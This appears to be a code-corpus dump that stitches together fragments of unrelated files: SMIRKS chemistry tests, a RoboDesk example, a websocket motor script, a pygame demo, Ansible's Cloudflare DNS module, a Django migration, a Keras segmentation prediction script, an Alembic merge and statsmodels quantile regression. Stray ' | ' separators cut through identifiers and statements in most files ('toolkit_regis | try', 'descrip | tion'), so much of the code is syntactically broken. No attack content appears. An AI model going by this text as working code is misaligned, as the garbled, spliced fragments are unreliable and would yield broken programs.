["[#6&X4&H0:1](-[#1])-[#6&X4]", "Atom", AtomChemicalEnvironment],
["[#6&X4&H0:1](-[#1])-[#6&X4:2]", "Bond", BondChemicalEnvironment],
["[*:1]-[*:2](-[#6&X4])-[*:3]", "Angle", AngleChemicalEnvironment],
[
"[#6&X4&H0:1](-[#1])-[#6&X4:2]-[#6&X4&H0:3](-[#1])-[#6&X4:4]",
"ProperTorsion",
TorsionChemicalEnvironment,
],
[
"[#1:1]-[#6&X4:2](-[#8:3])-[#1:4]",
"ImproperTorsion",
ImproperChemicalEnvironment,
],
# Test that an improper smirks is also valid as a general ChemicalEnvironment
[
"[#1:1]-[#6&X4:2](-[#8:3])-[*:4](-[#6&H1])-[#8:5]",
None,
ChemicalEnvironment,
],
["[#6$(*~[#6]=[#8])$(*-,=[#7!-1,#8,#16,#7])]", None, ChemicalEnvironment],
["CCC", None, ChemicalEnvironment],
["[#6:1]1(-;!@[#1,#6])=;@[#6]-;@[#6]1", "Atom", ChemicalEnvironment],
["C(O-[#7,#8])CC=[*]", None, ChemicalEnvironment],
[
"[#6$([#6X4](~[#7!-1,#8!-1,#16!-1,#9,#17,#35,#53])(~[#8]~[#1])):1]-[#6X2H2;+0:2]-,=,:;!@;!#[#7!-1,#8,#16:3]-[#4:4]",
"ProperTorsion",
TorsionChemicalEnvironment,
],
[
"[#6$([#6X4](~[#7!-1,#8!-1,#16!-1,#9,#17,#35,#53])(~[#8]~[#1])):1]1=CCCC1",
"Atom",
AtomChemicalEnvironment,
],
[
"[*:1]-[#7X3:2](-[#6a$(*1ccc(-[#8-1X1])cc1):3])-[*:4]",
"ImproperTorsion",
ImproperChemicalEnvironment,
],
["[#6X4:1]1~[*:2]~[*$(*~[#1]):3]1", "Angle", AngleChemicalEnvironment],
["[$([#7]1~[#6]-CC1)]", None, ChemicalEnvironment],
["[$(c1ccccc1)]", None, ChemicalEnvironment],
# The next two tests are for ring-closing bonds
[
"[H][C@:4]1(C(C([C:3]([N:2]1[C:1](=O)C([H])([H])[H])([H])[H])([H])[H])([H])[H])C=O",
"ImproperTorsion",
ChemicalEnvironment,
],
["[P:1]=1=[P]=[P]=[P]=[P:2]=1", "Bond", BondChemicalEnvironment],
],
)
@pytest.mark.parametrize("toolkit", toolkits)
def test_parseSMIRKS(
self, t | oolkit, smirks, expected_valence, expected_chemenv_class
):
"""
Test creating environments with SMIRKS
"""
env = expected_chemenv_class(smirks=smirks, toolkit_regis | try=toolkit)
actual_type = env.get_type()
assert (
actual_type == expected_valence
), f"SMIRKS ({smirks}) classified as {actual_type} instead of {expected_valence} using {toolkit} toolkit"
@pytest.mark.parametrize(
("smirks", "wrong_envs"),
[
(
"[*]",
[
AtomChemicalEnvironment,
BondChemicalEnvironment,
AngleChemicalEnvironment,
TorsionChemicalEnvironment,
ImproperChemicalEnvironment,
],
),
(
"[*:1]",
[
BondChemicalEnvironment,
AngleChemicalEnvironment,
TorsionChemicalEnvironment,
ImproperChemicalEnvironment,
],
),
(
"[*:1]~[*:2]",
[
AtomChemicalEnvironment,
AngleChemicalEnvironment,
TorsionChemicalEnvironment,
ImproperChemicalEnvironment,
],
),
(
"[*:3]~[*:2]~[*:1]",
[
AtomChemicalEnvironment,
BondChemicalEnvironment,
TorsionChemicalEnvironment,
ImproperChemicalEnvironment,
],
),
(
"[*:1]~[*:2]~[*:3]~[*:4]",
[
AtomChemicalEnvironment,
BondChemicalEnvironment,
AngleChemicalEnvironment,
ImproperChemicalEnvironment,
],
),
(
"[*:1]~[*:2](~[*:3])~[*:4]",
[
AtomChemicalEnvironment,
BondChemicalEnvironment,
AngleChemicalEnvironment,
TorsionChemicalEnvironment,
],
),
(
"[*:1]~[*:2]~[*:3]~[*:4]~[*:5]",
[
AtomChemicalEnvironment,
BondChemicalEnvironment,
AngleChemicalEnvironment,
TorsionChemicalEnvironment,
ImproperChemicalEnvironment,
],
),
],
)
def test_creating_wrong_environments(self, smirks, wrong_envs):
"""
Test exceptions for making environments with the wrong smirks
"""
for wrong_env in wrong_envs:
with pytest.raises(SMIRKSMismatchError):
env = wrong_env(smirks)
@pytest.mark.parametrize("toolkit", toolkits)
def test_wrong_smirks_error(self, toolkit):
"""
Check that an imparseable SMIRKS raises errors
"""
smirks = "[*;:1]"
with pytest.raises(SMIRKSParsingError):
env = ChemicalEnvironment(smirks, toolkit_registry=toolkit)
def test_embedded_atoms_smirks(self):
"""
Check embedded atom parsing works
"""
smirks = "[#1$(*-[#6](-[#7,#8,#9,#16,#17,#35])-[#7,#8,#9,#16,#17,#35]):1]~[$([#1]~[#6])]"
env = ChemicalEnvironment(smirks)
|
google-research/robodesk | robodesk/robodesk_example.py | Python | apache-2.0 | 642 | 0 | """
Copyright 2021 Google L | LC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of t | he License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import robodesk
env = robodesk.RoboDesk()
env.reset()
env.step([1, 0, 0, 0, 0])
|
RoboArmadillo/JSIM | motor.py | Python | gpl-2.0 | 1,123 | 0.015138 | import os,sys
import serial
import time
from websocket import create_connection
ws = create_connection("ws://echo.websocket.org/")
class Motor(object):
def __init__(self, which_motor, speed = 0):
global ser
self._speed = speed
if which_motor == 0:
self.motor_side = "left"
elif which_motor | ==1:
self.motor_side = "right"
@property
def speed(self):
return self._speed
@speed.setter
def speed(self, value):
        if -100 <= value <= 100:
            self._speed = value
            ws.send("1257, " + str(self.motor_side) + ", " + str(self._speed))
        elif value > 100 or value < -100:
            print "1257 ERROR - Speed value out of Range"
            sys.exit()
@speed.deleter
def speed(self):
del self._speed
'''
from websocket import create_connection
ws = create_connection("ws://echo.websocket.org/")
print "Sending 'Hello, World'..."
ws.send("Hello, World")
print "Sent"
print "Reeiving..."
result = ws.recv()
print "Received '%s'" % result
ws.close()
'''
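# Hedged usage sketch for the Motor class (added commentary, not part of the
# original script): both motors share the module-level websocket connection.
#   left = Motor(0)
#   right = Motor(1)
#   left.speed = 50    # sends "1257, left, 50"
#   right.speed = -50  # sends "1257, right, -50"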
| |
tidus747/Tutoriales_juegos_Python | Nociones PyGame/hola_mundo.py | Python | gpl-3.0 | 592 | 0.020305 | # -*- coding: utf-8 -*-
import pygame
pygame.init()
window = pygame.display.s | et_mode( (500, 400) )
while True:
pygame.draw.rect(window, (255, 0, 0), (100, 100, 100, 50), 2)
pygame.draw.ellipse(window, (255, 0, 0), (100, 100, 100, 50))
pygame.draw.rect(window, (0, 255, 0), (100, 150, 80, 40), 2)
pygame.draw | .ellipse(window, (0, 255, 0), (100, 150, 80, 40))
pygame.draw.rect(window, (0, 0, 255), (100, 190, 60, 30), 2)
pygame.draw.ellipse(window, (0, 0, 255), (100, 190, 60, 30))
    # Circle
pygame.draw.ellipse(window, (0, 0, 255), (100, 250, 40, 40))
pygame.display.update()
|
maartenq/ansible | lib/ansible/modules/net_tools/cloudflare_dns.py | Python | gpl-3.0 | 33,473 | 0.003256 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016 Michael Gruener <michael.gruener@chaosmoon.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cloudflare_dns
author: "Michael Gruener (@mgruener)"
requirements:
- "python >= 2.6"
version_added: "2.1"
short_description: manage Cloudflare DNS records
description:
- "Manages dns records via the Cloudflare API, see the docs: U(https://api.cloudflare.com/)"
options:
account_api_token:
description:
- >
Account API token. You can obtain your API key from the bottom of the Cloudflare 'My Account' page, found here: U(https://dash.cloudflare.com/)
required: true
account_email:
description:
- "Account email."
required: true
algorithm:
description:
- Algorithm number. Required for C(type=DS) and C(type=SSHFP) when C(state=present).
type: int
version_added: 2.7
cert_usage:
description:
- Certificate usage number. Required for C(type=TLSA) when C(state=present).
choices: [ 0, 1, 2, 3 ]
type: int
version_added: 2.7
hash_type:
description:
- Hash type number. Required for C(type=DS), C(type=SSHFP) and C(type=TLSA) when C(state=present).
choices: [ 1, 2 ]
type: int
version_added: 2.7
key_tag:
description:
- DNSSEC key tag. Needed for C(type=DS) when C(state=present).
type: int
version_added: 2.7
port:
description: Service port. Required for C(type=SRV) and C(type=TLSA).
priority:
description: Record priority. Required for C(type=MX) and C(type=SRV)
default: "1"
proto:
description:
- Service protocol. Required for C(type=SRV) and C(type=TLSA).
- Common values are tcp and udp.
- Before Ansible 2.6 only tcp and udp were available.
proxied:
description: Proxy through cloudflare network or just use DNS
type: bool
default: 'no'
version_added: "2.3"
record:
description:
- Record to add. Required if C(state=present). Default is C(@) (e.g. the zone name)
default: "@"
aliases: [ "name" ]
selector:
description:
- Selector number. Required for C(type=TLSA) when C(state=present).
choices: [ 0, 1 ]
type: int
version_added: 2.7
service:
description: Record service. Required for C(type=SRV)
solo:
description:
- Whether the record should be the only one for that record type and record name. Only use with C(state=present)
- This will delete all other records with the same record name and type.
state:
description:
- Whether the record(s) should exist or not
choices: [ 'present', 'absent' ]
default: present
timeout:
description:
- Timeout for Cloudflare API calls
default: 30
ttl:
description:
- The TTL to give the new record. Must be between 120 and 2,147,483,647 seconds, or 1 for automatic.
default: 1 (automatic)
type:
description:
- The type of DNS record to create. Required if C(state=present)
- C(type=DS), C(type=SSHFP) and C(type=TLSA) added in Ansible 2.7.
choices: [ 'A', 'AAAA', 'CNAME', 'TXT', 'SRV', 'MX', 'NS', 'DS', 'SPF', 'SSHFP', 'TLSA' ]
value:
description:
- The record value. Required for C(state=present)
aliases: [ "content" ]
weight:
descrip | tion: Service weight. Required for C(type=SRV)
default: "1"
zone:
description:
- The name of the Zone to work with (e.g. "example.com"). The Zone must already exist.
required: true
aliases: ["domain"]
'''
EXAMPLES = '''
# create a test.my.com A record to point to 127.0.0.1
- cloudflare_dns:
zone: my.com
record: test
type: A
value: 127.0.0.1
account_email: test@example.com
account_api_token: dummyapitoken
register: record
# cr | eate a my.com CNAME record to example.com
- cloudflare_dns:
zone: my.com
type: CNAME
value: example.com
state: present
account_email: test@example.com
account_api_token: dummyapitoken
# change its ttl
- cloudflare_dns:
zone: my.com
type: CNAME
value: example.com
ttl: 600
state: present
account_email: test@example.com
account_api_token: dummyapitoken
# and delete the record
- cloudflare_dns:
zone: my.com
type: CNAME
value: example.com
state: absent
account_email: test@example.com
account_api_token: dummyapitoken
# create a my.com CNAME record to example.com and proxy through cloudflare's network
- cloudflare_dns:
zone: my.com
type: CNAME
value: example.com
state: present
proxied: yes
account_email: test@example.com
account_api_token: dummyapitoken
# create TXT record "test.my.com" with value "unique value"
# delete all other TXT records named "test.my.com"
- cloudflare_dns:
domain: my.com
record: test
type: TXT
value: unique value
state: present
solo: true
account_email: test@example.com
account_api_token: dummyapitoken
# create a SRV record _foo._tcp.my.com
- cloudflare_dns:
domain: my.com
service: foo
proto: tcp
port: 3500
priority: 10
weight: 20
type: SRV
value: fooserver.my.com
# create a SSHFP record login.example.com
- cloudflare_dns:
zone: example.com
record: login
type: SSHFP
algorithm: 4
hash_type: 2
value: 9dc1d6742696d2f51ca1f1a78b3d16a840f7d111eb9454239e70db31363f33e1
# create a TLSA record _25._tcp.mail.example.com
- cloudflare_dns:
zone: example.com
record: mail
port: 25
proto: tcp
type: TLSA
cert_usage: 3
selector: 1
hash_type: 1
value: 6b76d034492b493e15a7376fccd08e63befdad0edab8e442562f532338364bf3
# Create a DS record for subdomain.example.com
- cloudflare_dns:
zone: example.com
record: subdomain
type: DS
key_tag: 5464
algorithm: 8
hash_type: 2
value: B4EB5AC4467D2DFB3BAF9FB9961DC1B6FED54A58CDFAA3E465081EC86F89BFAB
'''
RETURN = '''
record:
description: dictionary containing the record data
returned: success, except on record deletion
type: complex
contains:
content:
description: the record content (details depend on record type)
returned: success
type: string
sample: 192.0.2.91
created_on:
description: the record creation date
returned: success
type: string
sample: 2016-03-25T19:09:42.516553Z
data:
description: additional record data
returned: success, if type is SRV, DS, SSHFP or TLSA
type: dictionary
sample: {
name: "jabber",
port: 8080,
priority: 10,
proto: "_tcp",
service: "_xmpp",
target: "jabberhost.sample.com",
weight: 5,
}
id:
description: the record id
returned: success
type: string
sample: f9efb0549e96abcb750de63b38c9576e
locked:
description: No documentation available
returned: success
type: boolean
sample: False
meta:
description: No documentation available
returned: success
type: dictionary
sample: { auto_added: false }
modified_on:
description: record modification date
returned: success
type: string
sample: 2016-03-25T19:09:42.516553Z
name:
description: the record name as FQDN (including _service and _proto for SRV)
returned: success
type: string
sample: www.sample.com
priority:
description: priority of the MX record
returned: success, if type is MX
type: int
sample: 10
proxiable:
description: wh |
theworldbright/mainsite | aspc/blog/migrations/0001_initial.py | Python | mit | 736 | 0.001359 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=80)),
('body', models.TextField()),
('posted', models.DateTimeField()),
('slug', models.SlugField()),
],
| options={
'orderin | g': ['posted'],
},
bases=(models.Model,),
),
]
|
PythonProgramming/Python-3-basics-series | 28. multi line print.py | Python | mit | 549 | 0.007286 | '''
So now I just briefly want to cover multi line p | rint outs.
I remember making beautiful print outs as sort of guis, but I would do
print and then print out the line, then another print... and so on,
but you can actually do multi line prints with just 1 print. So let's see:
'''
print(
'''
This
is
a
test
'''
)
print(
'''
So it works like a multi-line
comment, but it will print out.
You can make kewl designs like this:
==============
| |
| | |
| BOX |
| |
| |
==============
'''
)
|
ultra-lstm/RNA-GAN | Refinement/predict.py | Python | mit | 7,897 | 0.008358 | import numpy as np
import pandas as pd
import tensorflow as tf
import scipy.misc
from keras.utils import plot_model
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Model, Sequential
from keras.layers import Input, Dropout, Activation, LSTM, Conv2D, Conv2DTranspose, Dense, TimeDistributed, Flatten, Reshape, Cropping2D, GaussianNoise, Concatenate, BatchNormalization, SeparableConv2D, MaxPooling2D, UpSampling2D, ZeroPadding2D
from keras.losses import mean_squared_error
from keras.optimizers import Adadelta, RMSprop
from keras import backend as K
from keras.layers.advanced_activations import LeakyReLU
from keras.models import load_model
#K.set_learning_phase(1) #set learning phase
sequences_per_batch = 1
epochs = 100
image_size = 240
sequence_length = 155
sequence_start = 0
train_seq = 1
train_cnt = int(sequence_length / train_seq)
file_list = 'val.txt'
input_mode = 'test'
input_data = 4
input_attention = 3
input_dimension = input_data + input_attention
output_dimension = 3
base = 42
folder = 'data'
# load data list
files = np.genfromtxt(file_list, dtype='str')
# define model
def conv_block(m, dim, acti, bn, res, do=0.2):
n = TimeDistributed(Conv2D(dim, 6, padding='same'))(m)
n = TimeDistributed(LeakyReLU())(n)
n = BatchNormalization()(n) if bn else n
n = TimeDistributed(Dropout(do))(n) if do else n
n = TimeDistributed(Conv2D(dim, 6, padding='same'))(n)
n = TimeDistributed(LeakyReLU())(n)
n = BatchNormalization()(n) if bn else n
return Concatenate()([m, n]) if res else n
def level_block(m, dim, depth, inc, acti, do, bn, mp, up, res):
if depth > 0:
n = conv_block(m, dim, acti, bn, res)
m = TimeDistributed(MaxPooling2D())(n) if mp else TimeDistributed(Conv2D(dim, 4, strides=2, padding='same'))(n)
print(n.shape)
print(m.shape)
m = level_block(m, int(inc*dim), depth-1, inc, acti, do, bn, mp, up, res)
if up:
m = TimeDistributed(UpSampling2D())(m)
m = TimeDistributed(Conv2D(dim, 4, padding='same'))(m)
m = TimeDistributed(LeakyReLU())(m)
else:
m = TimeDistributed(Conv2DTranspose(dim, 4, strides=2, padding='same'))(m)
m = TimeDistributed(LeakyReLU())(m)
n = Concatenate()([n, m])
m = conv_block(n, dim, acti, bn, res)
else:
m = conv_block(m, dim, acti, bn, res, do)
l = TimeDistributed(Flatten())(m)
#l = LSTM(4 * 4 * 128, stateful=True, return_sequences=True)(l)
l = LSTM(2048, stateful=True, return_sequences=True)(l)
l = TimeDistributed(Reshape((2, 2, 2048/4)))(l)
m = l
#m = Concatenate()([l, m])
m = conv_block(m, dim, acti, bn, res, do)
return m
def UNet(input_shape, out_ch=1, start_ch=64, depth=7, inc_rate=1.5, activation='relu',
dropout=0.4, batchnorm=True, maxpool=True, upconv=True, residual=False):
i = Input(batch_shape=input_shape)
o = TimeDistributed(ZeroPadding2D(padding=8))(i)
o = TimeDistributed(SeparableConv2D(start_ch, 7, padding='same'))(o)
o = level_block(o, start_ch, depth, inc_rate, activation, dropout, batchnorm, maxpool, upconv, residual)
o = TimeDistributed(Cropping2D(cropping=8))(o)
o = TimeDistributed(Conv2D(out_ch, 1, activation='tanh'))(o)
return Model(inputs=i, outputs=o)
model = UNet((sequences_per_batch, train_seq, image_size, image_size, input_dimension), out_ch=6, start_ch=base)
model.load_weights('v2.h5')
model.compile(loss='mean_squared_error', optimizer=RMSprop())
for k in model.layers:
print(k.output_shape)
plot_model(model, to_file='model.png')
def load_sequence(p, is_train=False):
pattern = p.decode("utf-8")
val = []
for s in xrange(sequence_length):
name = pattern.format('test', sequence_start + s, folder)
try:
input_img = scipy.misc.imread(name, mode='L').astype(np.float)
except:
val.append(np.zeros((1, image_size, image_size, input_dimension + output_dimension)))
continue
images = np.split(input_img, input_dimension + output_dimension, axis=1)
half_offset = 4
offset = half_offset * 2
hypersize = image_size + offset
fullsize = 256 + offset
h1 = int(np.ceil(np.random.uniform(1e-2, offset)))
w1 = int(np.ceil(np.random.uniform(1e-2, offset)))
conv = []
for image in images:
top = int((fullsize - image.shape[1]) / 2)
bottom = fullsize - image.shape[1] - top
image = np.append(np.zeros((image.shape[0], top)), image, axis=1)
image = np.append(image, np.zeros((image.shape[0], bottom)), axis=1)
left = int((fullsize - image.shape[0]) / 2)
right = fullsize - image.shape[0] - left
image = np.append(np.zeros((left, image.shape[1])), image, axis=0)
image = np.append(image, np.zeros((right, image.shape[1])), axis=0)
tmp = scipy.misc.imresize(image, [hypersize, hypersize], interp='nearest')
if is_train:
image = tmp[h1:h1+image_size, w1:w1+image_size]
else:
image = tmp[half_offset:half_offset+image_size, half_offset:half_offset+image_size]
image = image/127.5
conv.append(image)
#print(np.stack(conv, axis=2).shape)
val.append([np.stack(conv, axis=2)])
st = np.stack(val, axis=1)
#z = np.zeros((1, sequence_length - st.shape[1], image_size, image_size, input_dimension + output_dimension))
#o = np.append(z, st, axis=1)
o = st
o = o - 1
return o
def makeMask(gt, ct):
gt = (gt+1) / 2
ct = (ct+1) / 2
t_mask = np.clip(gt - ct, 0, 1)
n_mask = np.clip(ct - gt, 0, 1)
t_mask = (t_mask * 2) - 1
n_mask = (n_mask * 2) - 1
return np.concatenate((t_mask, n_mask), axis=4)
def extractGT(seq):
gt, data = np.split(batch_sequence, [output_dimension], axis=4)
gta, gtb, gtc = np.split(gt, 3, axis=4)
z1, z2, z3, z4, cta, ctb, ctc = np.split(data, input_dimension, axis=4)
m1 | = makeMask(gta, cta)
m2 = makeMask(gtb, ctb)
m3 = makeMask(gtc, ctc)
gt = np.concatenate((m1, m2, m3), axis=4)
return data, gt, np.concatenate((cta, ctb, ctc), | axis=4)
def combine(e, g, p1, q1):
p, m = np.split(e, 2, axis=4)
return np.sign(g + np.sign(p-p1) - np.sign(m-q1))
def merge(yo, error, p, q):
ae, be, ce = np.split(error, 3, axis=4)
ag, bg, cg = np.split(yo, 3, axis=4)
a = combine(ae, ag, p, q)
b = combine(be, bg, p, q)
c = combine(ce, cg, p, q)
return np.concatenate((a, b, c), axis=4)
def wrt(yo, error, name, p, q, c):
out = merge(yo, error, p, q)
all = np.append(batch_sequence, out, axis=4)
all = all.reshape((train_seq, image_size, image_size, 13))
sp = np.split(all, train_seq, axis=0)
sp = [s.reshape((image_size, image_size, 13)) for s in sp]
haa = np.concatenate(sp, axis=0)
jaa = np.concatenate(np.split(haa, 13, axis=2), axis=1)
fa = (jaa+1.)/2.
yo = np.concatenate((fa, fa, fa), axis=2)
scipy.misc.imsave(files[sequence].format('out', c, name), yo)
# test
number_of_sequences = files.size
for sequence in range(number_of_sequences):
print('S: {} '.format(sequence))
seq = load_sequence(files[sequence])
batch_sequences = np.split(seq, train_cnt, axis=1)
model.reset_states()
c = 0
for batch_sequence in batch_sequences:
data, gt, yo = extractGT(batch_sequence)
error = model.predict_on_batch(data)
wrt(yo, error, 'o1', 0.5, 0.5, c)
wrt(yo, error, 'o2', 0.3, 0.8, c)
wrt(yo, error, 'o3', 0.8, 0.3, c)
c = c + 1
|
fedspendingtransparency/data-act-broker-backend | dataactcore/migrations/versions/967fbc28a6ef_merge_ada3c1420257_and_bab396e50b1f.py | Python | cc0-1.0 | 581 | 0.006885 | """merge ad | a3c1420257 and bab396e50b1f
Revision ID: 967fbc28a6ef
Revises: ada3c1420257, bab396e50b1f
Create Date: 2017-08-07 11:48:14.479939
"""
# revision identifiers, used by Alembic.
revision = '967fbc28a6ef'
down_revision = ('ada3c1420257', 'bab396e50b1f')
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade(engine_name):
globals()["upgrade_%s" % engine_name]()
def downgrade(engine_name):
glo | bals()["downgrade_%s" % engine_name]()
def upgrade_data_broker():
pass
def downgrade_data_broker():
pass
|
bert9bert/statsmodels | statsmodels/regression/quantile_regression.py | Python | bsd-3-clause | 15,397 | 0.002663 | #!/usr/bin/env python
'''
Quantile regression model
Model parameters are estimated using iterated reweighted least squares. The
asymptotic covariance matrix is estimated using kernel density estimation.
Author: Vincent Arel-Bundock
License: BSD-3
Created: 2013-03-19
The original IRLS function was written for Matlab by Shapour Mohammadi,
University of Tehran, 2008 (shmohammadi@gmail.com), with some lines based on
code written by James P. Lesage in Applied Econometrics Using MATLAB(1999).PP.
73-4. Translated to python with permission from original author by Christian
Prinoth (christian at prinoth dot name).
'''
from statsmodels.compat.python import range
import numpy as np
import warnings
import scipy.stats as stats
from scipy.linalg import pinv
from scipy.stats import norm
from statsmodels.tools.tools import chain_dot
from statsmodels.compat.numpy import np_matrix_rank
from statsmodels.tools.decorators import cache_readonly
from statsmodels.regression.linear_model import (RegressionModel,
RegressionResults,
RegressionResultsWrapper)
from statsmodel | s.tools.sm_exceptions import (ConvergenceWarning,
IterationLimitWarning)
class QuantReg(RegressionModel):
'''Quantile Regression
Estimate a quantile regression model using iterative reweighted least
squares.
Parameters
----------
endog : array or dataframe
endogenous/response variable
exog : array or dataframe
exogenous/explanatory variable(s)
Notes
-----
The Least | Absolute Deviation (LAD) estimator is a special case where
quantile is set to 0.5 (q argument of the fit method).
The asymptotic covariance matrix is estimated following the procedure in
Greene (2008, p.407-408), using either the logistic or gaussian kernels
(kernel argument of the fit method).
References
----------
General:
* Birkes, D. and Y. Dodge(1993). Alternative Methods of Regression, John Wiley and Sons.
* Green,W. H. (2008). Econometric Analysis. Sixth Edition. International Student Edition.
* Koenker, R. (2005). Quantile Regression. New York: Cambridge University Press.
* LeSage, J. P.(1999). Applied Econometrics Using MATLAB,
Kernels (used by the fit method):
* Green (2008) Table 14.2
Bandwidth selection (used by the fit method):
* Bofinger, E. (1975). Estimation of a density function using order statistics. Australian Journal of Statistics 17: 1-17.
* Chamberlain, G. (1994). Quantile regression, censoring, and the structure of wages. In Advances in Econometrics, Vol. 1: Sixth World Congress, ed. C. A. Sims, 171-209. Cambridge: Cambridge University Press.
* Hall, P., and S. Sheather. (1988). On the distribution of the Studentized quantile. Journal of the Royal Statistical Society, Series B 50: 381-391.
Keywords: Least Absolute Deviation(LAD) Regression, Quantile Regression,
Regression, Robust Estimation.
'''
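    # Illustrative usage (added commentary, not part of the original docstring);
    # `y` is a 1-d response and `X` a design matrix that already contains a
    # constant column:
    #   mod = QuantReg(y, X)
    #   res = mod.fit(q=0.5, vcov='robust', kernel='epa', bandwidth='hsheather')
    #   res.params  # coefficients of the median (LAD) regression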
def __init__(self, endog, exog, **kwargs):
super(QuantReg, self).__init__(endog, exog, **kwargs)
def whiten(self, data):
"""
QuantReg model whitener does nothing: returns data.
"""
return data
def fit(self, q=.5, vcov='robust', kernel='epa', bandwidth='hsheather',
max_iter=1000, p_tol=1e-6, **kwargs):
'''Solve by Iterative Weighted Least Squares
Parameters
----------
q : float
Quantile must be between 0 and 1
vcov : string, method used to calculate the variance-covariance matrix
of the parameters. Default is ``robust``:
- robust : heteroskedasticity robust standard errors (as suggested
in Greene 6th edition)
- iid : iid errors (as in Stata 12)
kernel : string, kernel to use in the kernel density estimation for the
asymptotic covariance matrix:
- epa: Epanechnikov
- cos: Cosine
- gau: Gaussian
- par: Parzene
bandwidth: string, Bandwidth selection method in kernel density
estimation for asymptotic covariance estimate (full
references in QuantReg docstring):
- hsheather: Hall-Sheather (1988)
- bofinger: Bofinger (1975)
- chamberlain: Chamberlain (1994)
'''
if q < 0 or q > 1:
            raise Exception('q must be between 0 and 1')
kern_names = ['biw', 'cos', 'epa', 'gau', 'par']
if kernel not in kern_names:
raise Exception("kernel must be one of " + ', '.join(kern_names))
else:
kernel = kernels[kernel]
if bandwidth == 'hsheather':
bandwidth = hall_sheather
elif bandwidth == 'bofinger':
bandwidth = bofinger
elif bandwidth == 'chamberlain':
bandwidth = chamberlain
else:
raise Exception("bandwidth must be in 'hsheather', 'bofinger', 'chamberlain'")
endog = self.endog
exog = self.exog
nobs = self.nobs
exog_rank = np_matrix_rank(self.exog)
self.rank = exog_rank
self.df_model = float(self.rank - self.k_constant)
self.df_resid = self.nobs - self.rank
n_iter = 0
xstar = exog
beta = np.ones(exog_rank)
# TODO: better start, initial beta is used only for convergence check
# Note the following doesn't work yet,
# the iteration loop always starts with OLS as initial beta
# if start_params is not None:
# if len(start_params) != rank:
# raise ValueError('start_params has wrong length')
# beta = start_params
# else:
# # start with OLS
# beta = np.dot(np.linalg.pinv(exog), endog)
diff = 10
cycle = False
history = dict(params = [], mse=[])
while n_iter < max_iter and diff > p_tol and not cycle:
n_iter += 1
beta0 = beta
xtx = np.dot(xstar.T, exog)
xty = np.dot(xstar.T, endog)
beta = np.dot(pinv(xtx), xty)
resid = endog - np.dot(exog, beta)
mask = np.abs(resid) < .000001
resid[mask] = ((resid[mask] >= 0) * 2 - 1) * .000001
resid = np.where(resid < 0, q * resid, (1-q) * resid)
resid = np.abs(resid)
xstar = exog / resid[:, np.newaxis]
diff = np.max(np.abs(beta - beta0))
history['params'].append(beta)
history['mse'].append(np.mean(resid*resid))
if (n_iter >= 300) and (n_iter % 100 == 0):
# check for convergence circle, shouldn't happen
for ii in range(2, 10):
if np.all(beta == history['params'][-ii]):
cycle = True
warnings.warn("Convergence cycle detected", ConvergenceWarning)
break
if n_iter == max_iter:
warnings.warn("Maximum number of iterations (" + str(max_iter) +
") reached.", IterationLimitWarning)
e = endog - np.dot(exog, beta)
# Greene (2008, p.407) writes that Stata 6 uses this bandwidth:
# h = 0.9 * np.std(e) / (nobs**0.2)
# Instead, we calculate bandwidth as in Stata 12
iqre = stats.scoreatpercentile(e, 75) - stats.scoreatpercentile(e, 25)
h = bandwidth(nobs, q)
h = min(np.std(endog),
iqre / 1.34) * (norm.ppf(q + h) - norm.ppf(q - h))
fhat0 = 1. / (nobs * h) * np.sum(kernel(e / h))
if vcov == 'robust':
d = np.where(e > 0, (q/fhat0)**2, ((1-q)/fhat0)**2)
xtxi = pinv(np.dot(exog.T, exog))
xtdx = np.dot(exog.T * d[np.newaxis, :], exog)
vcov = chain_dot(xtxi, xtdx, xtxi)
elif vcov == 'iid':
vcov = (1. / fhat0)**2 * q * (1 - q) * pinv(np.dot(exog.T, exog))
else:
raise Exception("vcov must be 'robust' or 'iid'")
lfit = QuantRegResults(self, beta, n |
fridex/fabric8-analytics-worker | tests/workers/test_licensecheck.py | Python | gpl-3.0 | 2,348 | 0.001278 | # -*- coding: utf-8 -*-
import pytest
import os
import jsonschema
from flexmock import flexmock
from f8a_worker.workers import LicenseCheckTask
from f8a_worker.schemas import load_worker_schema, pop_schema_ref
from f8a_worker.object_cache import EPVCache
# TODO: drop the try/except after switching to Python 3
try:
from shutil import which
except ImportError:
# Near-enough-for-our-purposes equivalent in Python 2.x
from distutils.spawn import find_executable as which
@pytest.mark.offline
@pytest.mark.usefixtures("dispatcher_setup")
class TestLicenseCheck(object):
@pytest.mark.usefixtures("no_s3_connection")
def test_error(self):
data = "/this-is-not-a-real- | directory"
args = dict.fromkeys(('ecosystem', 'name', 'version'), 'some-value')
flexm | ock(EPVCache).should_receive('get_sources').and_return(data)
task = LicenseCheckTask.create_test_instance(task_name='source_licenses')
with pytest.raises(Exception):
results = task.execute(arguments=args)
@pytest.mark.skipif(not os.path.isfile('/opt/scancode-toolkit/scancode'),
reason="requires scancode")
@pytest.mark.usefixtures("no_s3_connection")
def test_execute(self):
data = os.path.join(
os.path.dirname(
os.path.abspath(__file__)), '..', 'data', 'license')
args = dict.fromkeys(('ecosystem', 'name', 'version'), 'some-value')
flexmock(EPVCache).should_receive('get_sources').and_return(data)
task = LicenseCheckTask.create_test_instance(task_name='source_licenses')
results = task.execute(arguments=args)
assert results is not None
assert isinstance(results, dict)
assert results['status'] == 'success'
# Check task self-validation
task.validate_result(results)
# Check scan consumer validation
schema_ref = pop_schema_ref(results)
schema = load_worker_schema(schema_ref)
jsonschema.validate(results, schema)
short_name = 'LGPL 2.1 or later'
details = results['details']
assert details.get('files_count') is not None and details.get('files_count') > 0
assert short_name in details.get('licenses', {})
summary = results['summary']
